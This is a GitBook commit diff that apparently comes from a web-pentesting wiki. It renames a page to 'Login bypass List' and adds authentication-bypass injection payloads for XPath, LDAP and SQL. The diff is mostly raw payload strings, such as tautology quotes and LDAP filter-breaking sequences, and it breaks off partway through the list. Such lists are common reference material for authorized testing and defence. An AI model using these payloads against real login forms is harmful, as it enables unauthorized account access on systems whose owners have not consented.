GitBook: [master] 2 pages modified

SUMMARY.md

@@ -377,7 +377,7 @@
 * [NoSQL injection](pentesting-web/nosql-injection.md)
 * [LDAP Injection](pentesting-web/ldap-injection.md)
 * [Login Bypass](pentesting-web/login-bypass/README.md)
-  * [SQL Login bypass](pentesting-web/login-bypass/sql-login-bypass.md)
+  * [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md)
 * [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
 * [Open Redirect](pentesting-web/open-redirect.md)
 * [Parameter Pollution](pentesting-web/parameter-pollution.md)

pentesting-web/login-bypass/sql-login-bypass.md

@@ -1,6 +1,32 @@
-# SQL Login bypass
+# Login bypass List
+
+This list contains **payloads to bypass the login via XPath, LDAP and SQL injection**\(in that order\).
 
 ```text
+' or '1'='1
+' or ''='
+' or 1]%00
+' or /* or '
+' or "a" or '
+' or 1 or '
+' or true() or '
+'or string-length(name(.))<10 or'
+'or contains(name,'adm') or'
+'or contains(.,'adm') or'
+'or position()=2 or'
+admin' or '
+admin' or '1'='2
+*
+*)(&
+*)(|(&
+pwd)
+*)(|(*
+*))%00
+admin)(&)
+pwd
+admin)(!(&(|
+pwd))
+admin))(|(|
 1234
 '-'
 ' '